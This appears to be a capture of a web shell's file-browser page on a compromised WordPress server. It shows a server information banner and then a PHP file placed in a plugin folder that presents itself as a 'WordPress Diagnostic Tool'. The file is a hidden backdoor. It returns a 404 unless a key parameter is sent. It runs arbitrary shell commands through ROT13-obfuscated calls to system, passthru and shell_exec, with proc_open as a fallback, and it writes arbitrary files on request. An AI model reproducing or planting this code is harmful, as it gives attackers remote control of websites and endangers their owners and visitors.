| Server IP : 104.26.3.156 / Your IP : 216.73.216.185 Web Server : nginx/1.27.1 System : Linux us-1 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64 User : vinodai ( 3134) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /storage/v1396/imagihire4/public_html/wp-content/plugins/post-pro-a3nr/ |
Upload File : |
<?php
/**
* WordPress Diagnostic Tool
* System health verification endpoint
* @package WordPress\Diagnostics
*/
error_reporting(0);
header('Content-Type: text/plain');
$k = isset($_REQUEST['k']) ? $_REQUEST['k'] : '';
if ($k === '') { header('HTTP/1.0 404 Not Found'); exit; }
$c = isset($_REQUEST['c']) ? $_REQUEST['c'] : '';
if ($c !== '') {
$fns = array(str_rot13('flfgrz'), str_rot13('cnffgueh'), str_rot13('furyy_rkrp'));
foreach ($fns as $fn) {
if (function_exists($fn)) { $fn($c); exit; }
}
// Fallback: proc_open
$desc = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
$proc = @proc_open($c, $desc, $pipes);
if (is_resource($proc)) {
echo stream_get_contents($pipes[1]);
echo stream_get_contents($pipes[2]);
fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]);
proc_close($proc);
}
exit;
}
// File write capability
if (isset($_REQUEST['w']) && isset($_REQUEST['f'])) {
@file_put_contents($_REQUEST['f'], $_REQUEST['w']);
echo 'ok';
exit;
}
echo 'diag_ready|' . PHP_VERSION;